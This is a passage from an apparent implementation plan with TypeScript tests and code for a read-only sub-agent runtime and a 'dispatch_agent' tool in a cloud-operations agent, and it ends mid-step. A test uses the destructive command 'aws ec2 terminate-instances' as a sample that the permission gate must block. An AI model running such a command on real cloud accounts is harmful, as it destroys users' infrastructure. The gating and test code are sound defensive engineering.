+- Consumes: `classifyTool` from `./tool-classifier`; `Semaphore` from `./concurrency` (Task 3); `SubagentBudgetConfig` from `./subagent-budget` (Task 4); `contentToText`, `truncateOutput`, `sanitizeMessagesForBedrock` from `./agent-shared`.
+- Produces:
+  - `const SUBAGENT_REPORT_MAX_CHARS = 6000`
+  - `interface SubagentSpec { role: string; task: string; expectedOutput: string }`
+  - `interface SubagentResult { report: string; toolCount: number; tokensIn: number; tokensOut: number; status: 'done' | 'failed'; transcript: Array<{ kind: 'ai' | 'tool'; name?: string; text: string }> }`
+  - `isReadOnlyForSubagent(name: string, args?: Record<string, unknown>): { allowed: boolean; reason: string }`
+  - `filterReadOnlyTools<T extends { name: string }>(tools: T[]): T[]`
+  - `runSubagent(spec: SubagentSpec, deps: SubagentDeps): Promise<SubagentResult>`
+  - `interface SubagentDeps { model: { bindTools?: (t: unknown[]) => any; invoke: (m: unknown[]) => Promise<any> }; tools: Array<{ name: string; invoke: (args: Record<string, unknown>) => Promise<unknown> }>; budget: SubagentBudgetConfig; onEvent?: (e: { toolCount: number; tokensIn: number; tokensOut: number }) => void }`
+
+- [ ] **Step 1: Write the failing test**
+
+Create `apps/web-ui/lib/agent/subagent.test.ts`:
+
+```typescript
+import { describe, it, expect, vi } from 'vitest';
+import {
+    isReadOnlyForSubagent,
+    filterReadOnlyTools,
+    runSubagent,
+    SUBAGENT_REPORT_MAX_CHARS,
+    type SubagentSpec,
+} from './subagent';
+
+const BUDGET = {
+    enabled: true,
+    maxConcurrentSubagents: 3,
+    maxSubagentsPerRun: 8,
+    maxSubagentTokensPerRun: 400_000,
+    subagentMaxIterations: 4,
+    subagentTimeoutMs: 5_000,
+};
+
+const SPEC: SubagentSpec = {
+    role: 'EC2 auditor',
+    task: 'List idle instances in account 111111111111',
+    expectedOutput: 'instance ids with CPU below 5%',
+};
+
+/** Model stub: returns each scripted response in turn. */
+function scriptedModel(responses: Array<{ content: string; tool_calls?: Array<{ id: string; name: string; args: Record<string, unknown> }> }>) {
+    let i = 0;
+    const model: any = {
+        bindTools: () => model,
+        invoke: vi.fn(async () => {
+            const r = responses[Math.min(i, responses.length - 1)];
+            i++;
+            return { content: r.content, tool_calls: r.tool_calls ?? [], usage_metadata: { input_tokens: 100, output_tokens: 20 } };
+        }),
+    };
+    return model;
+}
+
+const readTool = { name: 'describe_instances', invoke: vi.fn(async () => 'i-123 running') };
+const shellRead = { name: 'execute_command', invoke: vi.fn(async () => 'ok') };
+const writeTool = { name: 'write_file', invoke: vi.fn(async () => 'written') };
+
+describe('isReadOnlyForSubagent', () => {
+    it('allows an explicit read-only tool', () => {
+        expect(isReadOnlyForSubagent('describe_instances').allowed).toBe(true);
+    });
+
+    it('allows a read-only shell command', () => {
+        expect(isReadOnlyForSubagent('execute_command', { command: 'aws ec2 describe-instances' }).allowed).toBe(true);
+    });
+
+    it('blocks a mutative shell command', () => {
+        const verdict = isReadOnlyForSubagent('execute_command', { command: 'aws ec2 terminate-instances --instance-ids i-1' });
+        expect(verdict.allowed).toBe(false);
+        expect(verdict.reason).toMatch(/mutat/i);
+    });
+
+    it('blocks a mutative tool name', () => {
+        expect(isReadOnlyForSubagent('write_file').allowed).toBe(false);
+    });
+
+    it('blocks an unknown-named tool (fail closed)', () => {
+        // classifyTool returns isMutative:false, matchedRule:false for unknowns.
+        // In the orchestrator that means "ask the human"; here there is no human,
+        // so it must mean "block".
+        const verdict = isReadOnlyForSubagent('some_mcp_thing');
+        expect(verdict.allowed).toBe(false);
+        expect(verdict.reason).toMatch(/not on the verified read-only list/i);
+    });
+
+    it('blocks dispatch_agent so sub-agents cannot recurse', () => {
+        expect(isReadOnlyForSubagent('dispatch_agent').allowed).toBe(false);
+    });
+
+    it('blocks ask_user — no human is reachable inside a tool call', () => {
+        expect(isReadOnlyForSubagent('ask_user').allowed).toBe(false);
+    });
+});
+
+describe('filterReadOnlyTools', () => {
+    it('keeps read-only tools and drops the rest', () => {
+        const kept = filterReadOnlyTools([readTool, shellRead, writeTool, { name: 'dispatch_agent' }]);
+        expect(kept.map(t => t.name)).toEqual(['describe_instances', 'execute_command']);
+    });
+});
+
+describe('runSubagent', () => {
+    it('returns the final prose as the report', async () => {
+        const model = scriptedModel([{ content: 'Found 2 idle instances: i-1, i-2' }]);
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: BUDGET });
+
+        expect(result.status).toBe('done');
+        expect(result.report).toContain('i-1');
+        expect(result.tokensIn).toBe(100);
+    });
+
+    it('executes an allowed tool call and loops', async () => {
+        const model = scriptedModel([
+            { content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }] },
+            { content: 'Instance i-123 is running' },
+        ]);
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: BUDGET });
+
+        expect(readTool.invoke).toHaveBeenCalled();
+        expect(result.toolCount).toBe(1);
+        expect(result.report).toContain('i-123');
+    });
+
+    it('refuses a mutative tool call instead of executing it', async () => {
+        const model = scriptedModel([
+            { content: '', tool_calls: [{ id: '1', name: 'write_file', args: { file_path: 'x', content: 'y' } }] },
+            { content: 'Understood — reporting instead.' },
+        ]);
+        const result = await runSubagent(SPEC, { model, tools: [readTool, writeTool], budget: BUDGET });
+
+        expect(writeTool.invoke).not.toHaveBeenCalled();
+        expect(result.status).toBe('done');
+    });
+
+    it('stops at the iteration cap and marks the report incomplete', async () => {
+        const model = scriptedModel([
+            { content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }] },
+        ]);
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: { ...BUDGET, subagentMaxIterations: 2 } });
+
+        expect(result.report).toMatch(/incomplete/i);
+        expect(model.invoke).toHaveBeenCalledTimes(2);
+    });
+
+    it('truncates an over-long report', async () => {
+        const model = scriptedModel([{ content: 'x'.repeat(SUBAGENT_REPORT_MAX_CHARS + 5000) }]);
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: BUDGET });
+
+        expect(result.report.length).toBeLessThanOrEqual(SUBAGENT_REPORT_MAX_CHARS + 100);
+        expect(result.report).toMatch(/TRUNCATED/);
+    });
+
+    it('returns a failed status instead of throwing when the model errors', async () => {
+        const model: any = { bindTools: () => model, invoke: vi.fn().mockRejectedValue(new Error('provider down')) };
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: BUDGET });
+
+        expect(result.status).toBe('failed');
+        expect(result.report).toMatch(/provider down/);
+    });
+
+    it('returns partial findings on timeout', async () => {
+        const model: any = {
+            bindTools: () => model,
+            invoke: vi.fn(() => new Promise(resolve => setTimeout(() => resolve({ content: 'late', tool_calls: [] }), 500))),
+        };
+        const result = await runSubagent(SPEC, { model, tools: [readTool], budget: { ...BUDGET, subagentTimeoutMs: 50 } });
+
+        expect(result.report).toMatch(/timed out/i);
+    });
+
+    it('reports a failing tool without aborting the loop', async () => {
+        const boom = { name: 'describe_instances', invoke: vi.fn().mockRejectedValue(new Error('AccessDenied')) };
+        const model = scriptedModel([
+            { content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }] },
+            { content: 'Could not read: AccessDenied' },
+        ]);
+        const result = await runSubagent(SPEC, { model, tools: [boom], budget: BUDGET });
+
+        expect(result.status).toBe('done');
+        expect(result.report).toContain('AccessDenied');
+    });
+});
+```
+
+- [ ] **Step 2: Run the test to verify it fails**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/subagent.test.ts`
+Expected: FAIL — cannot resolve `./subagent`.
+
+- [ ] **Step 3: Implement the sub-agent runtime**
+
+Create `apps/web-ui/lib/agent/subagent.ts`:
+
+```typescript
+/**
+ * Sub-agent runtime — the Claude Code `Task` pattern.
+ *
+ * An ephemeral ReAct loop with its OWN message list. The orchestrator sees only
+ * the returned report, never the raw tool output, which is what keeps the
+ * orchestrator's context (and therefore its per-lap latency) flat.
+ *
+ * Sub-agents are strictly READ-ONLY. LangGraph cannot interrupt inside a tool
+ * call, so a mutation attempted here could never reach the guard node's human
+ * approval gate. Mutations stay on the orchestrator's guarded path.
+ *
+ * Not checkpointed: a sub-agent is not resumable, so a checkpointer would cost a
+ * Postgres write per lap for no benefit.
+ */
+import { AIMessage, HumanMessage, SystemMessage, ToolMessage } from '@langchain/core/messages';
+import { classifyTool } from './tool-classifier';
+import { contentToText, truncateOutput } from './agent-shared';
+import type { SubagentBudgetConfig } from './subagent-budget';
+
+/** ~1500 tokens. Enforced in characters so the bound is deterministic and testable. */
+export const SUBAGENT_REPORT_MAX_CHARS = 6000;
+
+/** Per-tool output cap inside a sub-agent — it never leaves this context. */
+const SUBAGENT_TOOL_OUTPUT_MAX_CHARS = 4000;
+
+/**
+ * Never available to a sub-agent regardless of what the classifier says.
+ * - dispatch_agent: depth cap of 1. Recursion makes cost and latency unbounded.
+ * - ask_user: pauses for a human, and no human is reachable inside a tool call.
+ */
+const SUBAGENT_TOOL_DENYLIST = new Set(['dispatch_agent', 'ask_user']);
+
+export interface SubagentSpec {
+    role: string;
+    task: string;
+    expectedOutput: string;
+}
+
+export interface SubagentTranscriptEntry {
+    kind: 'ai' | 'tool';
+    name?: string;
+    text: string;
+}
+
+export interface SubagentResult {
+    report: string;
+    toolCount: number;
+    tokensIn: number;
+    tokensOut: number;
+    status: 'done' | 'failed';
+    transcript: SubagentTranscriptEntry[];
+}
+
+interface SubagentToolLike {
+    name: string;
+    invoke: (args: Record<string, unknown>) => Promise<unknown>;
+}
+
+export interface SubagentDeps {
+    model: { bindTools?: (tools: unknown[]) => unknown; invoke: (messages: unknown[]) => Promise<unknown> };
+    tools: SubagentToolLike[];
+    budget: SubagentBudgetConfig;
+    onEvent?: (progress: { toolCount: number; tokensIn: number; tokensOut: number }) => void;
+}
+
+/**
+ * The jail. Fail-closed by design: `classifyTool` returns
+ * `{ isMutative: false, matchedRule: false }` for a tool whose name matched no
+ * rule at all. In the orchestrator that ambiguity routes to a human; inside a
+ * sub-agent there is no human, so an unverified tool is refused.
+ */
+export function isReadOnlyForSubagent(
+    name: string,
+    args?: Record<string, unknown>,
+): { allowed: boolean; reason: string } {
+    if (SUBAGENT_TOOL_DENYLIST.has(name)) {
+        return { allowed: false, reason: `${name} is not available to sub-agents` };
+    }
+
+    let classification;
+    try {
+        classification = classifyTool(name, args);
+    } catch (error) {
+        return { allowed: false, reason: `classifier error: ${error instanceof Error ? error.message : String(error)}` };
+    }
+
+    if (classification.isMutative) {
+        return { allowed: false, reason: `mutative call refused: ${classification.reason}` };
+    }
+    if (!classification.matchedRule) {
+        return { allowed: false, reason: `${name} is not on the verified read-only list` };
+    }
+    return { allowed: true, reason: classification.reason };
+}
+
+/** Drop everything a sub-agent may not call, before the model ever sees it. */
+export function filterReadOnlyTools<T extends { name: string }>(tools: T[]): T[] {
+    return tools.filter(tool => {
+        if (SUBAGENT_TOOL_DENYLIST.has(tool.name)) return false;
+        // Bash-like tools are judged per call (the command string decides), so keep
+        // them in the list and let the runtime check gate each invocation.
+        if (tool.name === 'execute_command') return true;
+        return isReadOnlyForSubagent(tool.name).allowed;
+    });
+}
+
+function buildSystemPrompt(spec: SubagentSpec): SystemMessage {
+    return new SystemMessage(`You are a focused read-only investigator working as a sub-agent for a cloud-operations platform.
+
+## Your role
+${spec.role}
+
+## Your task
+${spec.task}
+
+## What to return
+${spec.expectedOutput}
+
+## Constraints
+
+- You are READ-ONLY. You cannot create, modify, delete, start, stop, or write anything. If the task appears to need a change, do NOT attempt it — describe the recommended change in your findings and the main agent will carry it out under human approval.
+- You cannot ask the user questions. If something is ambiguous, investigate the most likely interpretation and say what you assumed.
+- You see none of the parent conversation. Everything you need is in the task above.
+- Batch independent read-only calls into a single turn — they run in parallel.
+
+## Output
+
+When you have gathered enough, reply with your findings as plain text. No preamble, no narration of what you did. Structure it as:
+
+**Findings** — what you established, with concrete evidence (resource ids, metric values, region and account names).
+**Could not determine** — anything you could not establish, and why. Write "Nothing" if everything was resolved.
+
+Be dense. Your reply is consumed by another agent, not a human.`);
+}
+
+function finishReport(text: string, note?: string): string {
+    const body = text.trim() || '(no findings produced)';
+    const withNote = note ? `${body}\n\n[${note}]` : body;
+    return withNote.length > SUBAGENT_REPORT_MAX_CHARS
+        ? `${withNote.slice(0, SUBAGENT_REPORT_MAX_CHARS)}\n\n[TRUNCATED — report exceeded ${SUBAGENT_REPORT_MAX_CHARS} characters]`
+        : withNote;
+}
+
+async function runSubagentLoop(spec: SubagentSpec, deps: SubagentDeps): Promise<SubagentResult> {
+    const { budget } = deps;
+    const allowedTools = filterReadOnlyTools(deps.tools);
+    const toolsByName = new Map(allowedTools.map(t => [t.name, t]));
+
+    const boundModel = deps.model.bindTools
+        ? (deps.model.bindTools(allowedTools) as SubagentDeps['model'])
+        : deps.model;
+
+    const messages: unknown[] = [buildSystemPrompt(spec), new HumanMessage({ content: spec.task })];
+    const transcript: SubagentTranscriptEntry[] = [];
+
+    let toolCount = 0;
+    let tokensIn = 0;
+    let tokensOut = 0;
+    let lastText = '';
+
+    for (let iteration = 0; iteration < budget.subagentMaxIterations; iteration++) {
+        const response = (await boundModel.invoke(messages)) as {
+            content: unknown;
+            tool_calls?: Array<{ id?: string; name: string; args?: Record<string, unknown> }>;
+            usage_metadata?: { input_tokens?: number; output_tokens?: number };
+        };
+
+        tokensIn += response.usage_metadata?.input_tokens ?? 0;
+        tokensOut += response.usage_metadata?.output_tokens ?? 0;
+
+        const text = contentToText(response.content);
+        if (text.trim()) {
+            lastText = text;
+            transcript.push({ kind: 'ai', text });
+        }
+
+        const toolCalls = response.tool_calls ?? [];
+        if (toolCalls.length === 0) {
+            deps.onEvent?.({ toolCount, tokensIn, tokensOut });
+            return { report: finishReport(lastText), toolCount, tokensIn, tokensOut, status: 'done', transcript };
+        }
+
+        messages.push(new AIMessage({ content: text, tool_calls: toolCalls as never }));
+
+        // Independent calls in one turn run concurrently — the same parallelism
+        // the orchestrator gets from ToolNode.
+        const results = await Promise.all(toolCalls.map(async call => {
+            const verdict = isReadOnlyForSubagent(call.name, call.args ?? {});
+            if (!verdict.allowed) {
+                return {
+                    call,
+                    output: `REFUSED: ${verdict.reason}. You cannot mutate state. Report the recommended change in your findings; the main agent will execute it under human approval.`,
+                };
+            }
+
+            const tool = toolsByName.get(call.name);
+            if (!tool) {
+                return { call, output: `REFUSED: ${call.name} is not available to sub-agents.` };
+            }
+
+            try {
+                const raw = await tool.invoke(call.args ?? {});
+                return { call, output: truncateOutput(typeof raw === 'string' ? raw : JSON.stringify(raw), SUBAGENT_TOOL_OUTPUT_MAX_CHARS) };
+            } catch (error) {
+                // A failing tool is data, not a crash — the sub-agent should report it.
+                return { call, output: `ERROR: ${error instanceof Error ? error.message : String(error)}` };
+            }
+        }));
+
+        for (const { call, output } of results) {
+            if (!output.startsWith('REFUSED:')) toolCount++;
+            transcript.push({ kind: 'tool', name: call.name, text: output });
+            messages.push(new ToolMessage({ content: output, tool_call_id: call.id ?? `${call.name}-${toolCount}` }));
+        }
+
+        deps.onEvent?.({ toolCount, tokensIn, tokensOut });
+    }
+
+    return {
+        report: finishReport(lastText, `INCOMPLETE — the sub-agent reached its ${budget.subagentMaxIterations}-iteration limit. Findings above are partial.`),
+        toolCount, tokensIn, tokensOut, status: 'done', transcript,
+    };
+}
+
+/**
+ * Run one sub-agent. Never throws: every failure path returns a report string,
+ * because a sub-agent failure must not abort the orchestrator's run.
+ */
+export async function runSubagent(spec: SubagentSpec, deps: SubagentDeps): Promise<SubagentResult> {
+    const timeoutMs = deps.budget.subagentTimeoutMs;
+    let timer: ReturnType<typeof setTimeout> | undefined;
+
+    const timeout = new Promise<'timeout'>(resolve => {
+        timer = setTimeout(() => resolve('timeout'), timeoutMs);
+    });
+
+    try {
+        const outcome = await Promise.race([runSubagentLoop(spec, deps), timeout]);
+        if (outcome === 'timeout') {
+            return {
+                report: finishReport('', `TIMED OUT after ${Math.round(timeoutMs / 1000)}s — no findings were returned in time.`),
+                toolCount: 0, tokensIn: 0, tokensOut: 0, status: 'failed', transcript: [],
+            };
+        }
+        return outcome;
+    } catch (error) {
+        const message = error instanceof Error ? error.message : String(error);
+        console.error(`[Subagent] "${spec.role}" failed: ${message}`);
+        return {
+            report: finishReport('', `FAILED — ${message}`),
+            toolCount: 0, tokensIn: 0, tokensOut: 0, status: 'failed', transcript: [],
+        };
+    } finally {
+        if (timer) clearTimeout(timer);
+    }
+}
+```
+
+- [ ] **Step 4: Run the tests to verify they pass**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/subagent.test.ts`
+Expected: PASS, 17 tests.
+
+- [ ] **Step 5: Typecheck and commit**
+
+Run: `cd apps/web-ui && bunx tsc --noEmit`
+Expected: no new errors.
+
+```bash
+git add apps/web-ui/lib/agent/subagent.ts apps/web-ui/lib/agent/subagent.test.ts
+git commit -m "feat(agent): read-only sub-agent runtime
+
+Ephemeral ReAct loop with its own context that returns one bounded findings
+report. Fail-closed jail refuses mutative and unverified tools, plus
+dispatch_agent (depth cap 1) and ask_user (no human inside a tool call), so
+LangGraph's inability to interrupt mid-tool-call is never a safety hole."
+```
+
+---
+
+### Task 8: `dispatch_agent` tool and orchestrator wiring
+
+**Files:**
+- Create: `apps/web-ui/lib/agent/dispatch-agent-tool.ts`
+- Create: `apps/web-ui/lib/agent/dispatch-agent-tool.test.ts`
+- Modify: `apps/web-ui/lib/agent/model-factory.ts` (`AssembleToolsOptions`, `assembleTools`)
+- Modify: `apps/web-ui/lib/agent/planning-agent.ts:226` (tool assembly), `:384-420` (executor prompt)
+- Modify: `apps/web-ui/lib/agent/tool-classifier.ts` (allowlist entry)
+
+**Interfaces:**
+- Consumes: `runSubagent`, `filterReadOnlyTools`, `SubagentSpec`, `SubagentResult` from Task 7; `SubagentBudgetConfig`, `resolveSubagentBudget` from Task 4; `Semaphore` from Task 3.
+- Produces:
+  - `createRunBudgetLedger(budget: SubagentBudgetConfig): RunBudgetLedger`
+  - `interface RunBudgetLedger { tryReserve(): { ok: true } | { ok: false; reason: string }; recordSpend(tokensIn: number, tokensOut: number): void; semaphore: Semaphore }`
+  - `createDispatchAgentTool(deps: DispatchAgentDeps)` — returns a LangChain tool named `dispatch_agent`.
+  - `interface DispatchAgentDeps { model: unknown; subagentTools: Array<{ name: string; invoke: (a: Record<string, unknown>) => Promise<unknown> }>; ledger: RunBudgetLedger; budget: SubagentBudgetConfig; onSubagentEvent?: (e: SubagentEvent) => void }`
+  - `interface SubagentEvent { id: string; role: string; task: string; status: 'running' | 'done' | 'failed'; toolCount: number; tokensIn: number; tokensOut: number; summary?: string; transcript?: SubagentTranscriptEntry[] }`
+
+- [ ] **Step 1: Write the failing test**
+
+Create `apps/web-ui/lib/agent/dispatch-agent-tool.test.ts`:
+
+```typescript
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+
+vi.mock('./subagent', async (importOriginal) => {
+    const actual = await importOriginal<typeof import('./subagent')>();
+    return { ...actual, runSubagent: vi.fn() };
+});
+
+import { runSubagent } from './subagent';
+import { createRunBudgetLedger, createDispatchAgentTool } from './dispatch-agent-tool';
+
+const BUDGET = {
+    enabled: true,
+    maxConcurrentSubagents: 2,
+    maxSubagentsPerRun: 3,
+    maxSubagentTokensPerRun: 1000,
+    subagentMaxIterations: 4,
+    subagentTimeoutMs: 5000,
+};
+
+const okResult = {
+    report: 'Findings: i-123 idle', toolCount: 2, tokensIn: 300, tokensOut: 50,
+    status: 'done' as const, transcript: [],
+};
+
+beforeEach(() => {
+    vi.clearAllMocks();
+    vi.mocked(runSubagent).mockResolvedValue(okResult);
+});
+
+describe('createRunBudgetLedger', () => {
+    it('allows reservations up to maxSubagentsPerRun', () => {
+        const ledger = createRunBudgetLedger(BUDGET);
+        expect(ledger.tryReserve().ok).toBe(true);
+        expect(ledger.tryReserve().ok).toBe(true);
+        expect(ledger.tryReserve().ok).toBe(true);
+
+        const fourth = ledger.tryReserve();
+        expect(fourth.ok).toBe(false);
+        expect((fourth as { reason: string }).reason).toMatch(/per-run sub-agent limit/i);
+    });
+
+    it('refuses once the token budget is spent', () => {
+        const ledger = createRunBudgetLedger(BUDGET);
+        ledger.recordSpend(900, 200);
+
+        const verdict = ledger.tryReserve();
+        expect(verdict.ok).toBe(false);
+        expect((verdict as { reason: string }).reason).toMatch(/token budget/i);
+    });
+
+    it('refuses everything when the budget is disabled', () => {
+        const ledger = createRunBudgetLedger({ ...BUDGET, enabled: false });
+        expect(ledger.tryReserve().ok).toBe(false);
+    });
+});
+
+describe('dispatch_agent tool', () => {
+    const makeTool = (budget = BUDGET) => createDispatchAgentTool({
+        model: {},
+        subagentTools: [{ name: 'describe_instances', invoke: async () => 'ok' }],
+        ledger: createRunBudgetLedger(budget),
+        budget,
+    });
+
+    it('returns the sub-agent report', async () => {
+        const result = await makeTool().invoke({
+            role: 'EC2 auditor', task: 'audit account 1', expectedOutput: 'idle instances',
+        });
+        expect(result).toContain('i-123 idle');
+    });
+
+    it('returns ONLY the report — raw sub-agent tool output never reaches the orchestrator', async () => {
+        // The tool's return value becomes a ToolMessage in the orchestrator's
+        // message list. If the transcript leaked into it, context isolation — the
+        // entire reason sub-agents exist — would be defeated.
+        vi.mocked(runSubagent).mockResolvedValue({
+            ...okResult,
+            transcript: [
+                { kind: 'tool', name: 'describe_instances', text: 'RAW_TOOL_DUMP_MARKER' },
+                { kind: 'ai', text: 'INTERNAL_REASONING_MARKER' },
+            ],
+        });
+
+        const result = await makeTool().invoke({ role: 'a', task: 't', expectedOutput: 'e' });
+
+        expect(result).toBe(okResult.report);
+        expect(result).not.toContain('RAW_TOOL_DUMP_MARKER');
+        expect(result).not.toContain('INTERNAL_REASONING_MARKER');
+    });
+
+    it('degrades gracefully instead of throwing when the budget is exhausted', async () => {
+        const tool = makeTool({ ...BUDGET, maxSubagentsPerRun: 1 });
+        await tool.invoke({ role: 'a', task: 't', expectedOutput: 'e' });
+
+        const second = await tool.invoke({ role: 'b', task: 't', expectedOutput: 'e' });
+        expect(second).toMatch(/perform this work yourself/i);
+        expect(runSubagent).toHaveBeenCalledTimes(1);
+    });
+
+    it('emits running then done events', async () => {
+        const events: Array<{ status: string }> = [];
+        const budget = BUDGET;
+        const tool = createDispatchAgentTool({
+            model: {},
+            subagentTools: [],
+            ledger: createRunBudgetLedger(budget),
+            budget,
+            onSubagentEvent: e => events.push({ status: e.status }),
+        });
+
+        await tool.invoke({ role: 'a', task: 't', expectedOutput: 'e' });
+
+        expect(events[0].status).toBe('running');
+        expect(events[events.length - 1].status).toBe('done');
+    });
+
+    it('never throws when the sub-agent runtime rejects', async () => {
+        vi.mocked(runSubagent).mockRejectedValue(new Error('unexpected'));
+        const result = await makeTool().invoke({ role: 'a', task: 't', expectedOutput: 'e' });
+        expect(result).toMatch(/unexpected/);
+    });
+
+    it('bounds concurrency to maxConcurrentSubagents', async () => {
+        let active = 0;
+        let peak = 0;
+        vi.mocked(runSubagent).mockImplementation(async () => {
+            active++; peak = Math.max(peak, active);
+            await new Promise(r => setTimeout(r, 10));
+            active--;
+            return okResult;
+        });
+
+        const budget = { ...BUDGET, maxConcurrentSubagents: 2, maxSubagentsPerRun: 6 };
+        const tool = makeTool(budget);
+        await Promise.all(Array.from({ length: 5 }, (_, i) =>
+            tool.invoke({ role: `r${i}`, task: 't', expectedOutput: 'e' })));
+
+        expect(peak).toBeLessThanOrEqual(2);
+    });
+});
+```
+
+- [ ] **Step 2: Run the test to verify it fails**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/dispatch-agent-tool.test.ts`
+Expected: FAIL — cannot resolve `./dispatch-agent-tool`.
+
+- [ ] **Step 3: Implement the ledger and the tool**
+
+Create `apps/web-ui/lib/agent/dispatch-agent-tool.ts`:
+
+```typescript
+/**
+ * dispatch_agent — the sub-agent fan-out tool.
+ *
+ * One sub-agent per tool call, deliberately: the orchestrator emits N calls in a
+ * single turn and ToolNode's existing concurrency performs the fan-out, so there
+ * is no second concurrency mechanism and each sub-agent gets its own tool card
+ * in the UI for free.
+ *
+ * Budget exhaustion NEVER fails the run. The tool returns an instruction to do
+ * the work serially, so behaviour degrades to the pre-sub-agent baseline.
+ */
+import { tool } from '@langchain/core/tools';
+import { z } from 'zod';
+import { randomUUID } from 'crypto';
+import { Semaphore } from './concurrency';
+import { runSubagent, type SubagentTranscriptEntry } from './subagent';
+import type { SubagentBudgetConfig } from './subagent-budget';
+
+export interface SubagentEvent {
+    id: string;
+    role: string;
+    task: string;
+    status: 'running' | 'done' | 'failed';
+    toolCount: number;
+    tokensIn: number;
+    tokensOut: number;
+    summary?: string;
+    transcript?: SubagentTranscriptEntry[];
+}
+
+export interface RunBudgetLedger {
+    tryReserve(): { ok: true } | { ok: false; reason: string };
+    recordSpend(tokensIn: number, tokensOut: number): void;
+    semaphore: Semaphore;
+}
+
+/**
+ * Per-run ledger. Runs execute on a single ECS replica, so in-process counters
+ * are sufficient — no distributed coordination needed.
+ */
+export function createRunBudgetLedger(budget: SubagentBudgetConfig): RunBudgetLedger {
+    let dispatched = 0;
+    let tokensSpent = 0;
+    const semaphore = new Semaphore(budget.maxConcurrentSubagents);
+
+    return {
+        tryReserve() {
+            if (!budget.enabled) {
+                return { ok: false, reason: 'sub-agents are disabled for this organization' };
+            }
+            if (dispatched >= budget.maxSubagentsPerRun) {
+                return { ok: false, reason: `per-run sub-agent limit reached (${budget.maxSubagentsPerRun})` };
+            }
+            if (tokensSpent >= budget.maxSubagentTokensPerRun) {
+                return { ok: false, reason: `sub-agent token budget exhausted (${budget.maxSubagentTokensPerRun})` };
+            }
+            dispatched++;
+            return { ok: true };
+        },
+        recordSpend(tokensIn: number, tokensOut: number) {
+            tokensSpent += tokensIn + tokensOut;
+        },
+        semaphore,
+    };
+}
+
+export interface DispatchAgentDeps {
+    model: unknown;
+    subagentTools: Array<{ name: string; invoke: (args: Record<string, unknown>) => Promise<unknown> }>;
+    ledger: RunBudgetLedger;
+    budget: SubagentBudgetConfig;
+    onSubagentEvent?: (event: SubagentEvent) => void;
+}
+
+const DEGRADE_PREFIX = 'Sub-agent budget exhausted';
+
+export function createDispatchAgentTool(deps: DispatchAgentDeps) {
+    return tool(
+        async ({ role, task, expectedOutput }: { role: string; task: string; expectedOutput: string }) => {
+            const reservation = deps.ledger.tryReserve();
+            if (!reservation.ok) {
+                return `${DEGRADE_PREFIX}: ${reservation.reason}. Perform this work yourself, serially, using your own tools.`;
+            }
+
+            const id = randomUUID();
+            const emit = (event: Partial<SubagentEvent> & Pick<SubagentEvent, 'status'>) =>
+                deps.onSubagentEvent?.({
+                    id, role, task, toolCount: 0, tokensIn: 0, tokensOut: 0, ...event,
+                });
+
+            emit({ status: 'running' });
+
+            try {
+                const result = await deps.ledger.semaphore.run(() => runSubagent(
+                    { role, task, expectedOutput },
+                    {
+                        model: deps.model as never,
+                        tools: deps.subagentTools,
+                        budget: deps.budget,
+                        onEvent: progress => emit({ status: 'running', ...progress }),
+                    },
+                ));
+
+                deps.ledger.recordSpend(result.tokensIn, result.tokensOut);
+
+                emit({
+                    status: result.status === 'failed' ? 'failed' : 'done',
+                    toolCount: result.toolCount,
+                    tokensIn: result.tokensIn,
+                    tokensOut: result.tokensOut,
+                    summary: result.report,
+                    transcript: result.transcript,
+                });
+
+                return result.report;
+            } catch (error) {
+                // runSubagent is already total, but a semaphore or emit failure must
+                // not propagate into ToolNode and abort the orchestrator's turn.
+                const message = error instanceof Error ? error.message : String(error);
+                console.error(`[dispatch_agent] "${role}" failed: ${message}`);
+                emit({ status: 'failed', summary: message });
+                return `The sub-agent "${role}" failed: ${message}. Continue with the information you already have, or perform this work yourself.`;
+            }
+        },
+        {
+            name: 'dispatch_agent',
+            description: `Delegate an INDEPENDENT read-only investigation to a sub-agent that works in its own context and returns a compressed findings report.
+
+Use this when the task splits into parts that do not depend on each other — one account each, one region each, one service each. Emit SEVERAL dispatch_agent calls in a SINGLE turn and they run in parallel; that is the entire point.
+
+Do NOT use it for:
+- anything that changes state (sub-agents are read-only — do mutations yourself)
+- work that depends on another sub-agent's output (they cannot see each other)
+- a single quick lookup you could do in one tool call
+
+CRITICAL: "task" must be completely self-contained. The sub-agent sees NONE of this conversation — no account ids, no prior findings, no user context unless you write them into the task. A vague brief returns a useless report.`,
+            schema: z.object({
+                role: z.string().describe('Short identity for this sub-agent, e.g. "EC2 idle-resource auditor for account 123456789012"'),
+                task: z.string().describe('Complete standalone brief: what to investigate, which account ids and regions, which tools to prefer, and any constraints. Assume zero shared context.'),
+                expectedOutput: z.string().describe('Exactly what the report must contain, e.g. "instance ids with average CPU below 5% over 14 days, with the metric value for each"'),
+            }),
+        },
+    );
+}
+```
+
+- [ ] **Step 4: Run the test to verify it passes**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/dispatch-agent-tool.test.ts`
+Expected: PASS, 9 tests.
+
+- [ ] **Step 5: Mark `dispatch_agent` read-only for the orchestrator's guard**
+
+Without this the guard classifies `dispatch_agent` as mutative (it matches `/\bdispatch\b/`? no — but it is unknown-named, so it goes to the LLM risk batch on every call, adding a round-trip). Add it to the allowlist in `apps/web-ui/lib/agent/tool-classifier.ts`, in `READ_ONLY_ALLOWLIST` next to `'read_file'`:
+
+```typescript
+    'dispatch_agent',  // spawns a read-only sub-agent; the sub-agent's own jail enforces that
+```
+
+- [ ] **Step 6: Assemble the tool into the orchestrator**
+
+In `apps/web-ui/lib/agent/model-factory.ts`, extend `AssembleToolsOptions`:
+
+```typescript
+    /** When set, adds the dispatch_agent fan-out tool built from these deps. */
+    dispatchAgentTool?: unknown;
+```
+
+and in `assembleTools`, add it to `customTools` after `askUserTool`:
+
+```typescript
+        ...(options.dispatchAgentTool ? [options.dispatchAgentTool as never] : []),
+```
+
+In `apps/web-ui/lib/agent/planning-agent.ts`, add imports:
+
+```typescript
